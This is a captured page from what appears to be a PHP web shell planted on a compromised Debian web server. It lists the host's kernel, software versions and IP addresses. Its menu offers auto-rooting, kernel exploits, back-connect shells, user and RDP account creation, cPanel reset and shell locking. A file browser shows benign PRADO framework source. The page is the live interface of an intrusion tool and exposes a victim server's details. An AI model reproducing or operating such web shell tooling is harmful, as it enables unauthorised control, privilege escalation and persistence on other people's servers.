Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.2.239
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
IO /
[ HOME SHELL ]
Name
Size
Permission
Action
ITextWriter.php
607
B
-rw-r--r--
TOutputWriter.php
720
B
-rw-r--r--
TTarFileExtractor.php
16.56
KB
-rw-r--r--
TTextWriter.php
1.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TTextWriter.php
<?php /** * TTextWriter class file * * @author Qiang Xue <qiang.xue@gmail.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\IO; /** * TTextWriter class. * * TTextWriter implements a memory-based text writer. * Content written by TTextWriter are stored in memory * and can be obtained by calling {@link flush()}. * * @author Qiang Xue <qiang.xue@gmail.com> * @since 3.0 */ class TTextWriter extends \Prado\TComponent implements \Prado\IO\ITextWriter { private $_str = ''; /** * Flushes the content that has been written. * @return string the content being flushed */ public function flush() { $str = $this->_str; $this->_str = ''; return $str; } /** * Writes a string. * @param string $str string to be written */ public function write($str) { $this->_str .= $str; } /** * Writers a string and terminates it with a newline. * @param string $str content to be written * @see write */ public function writeLine($str = '') { $this->write($str . "\n"); } }
Close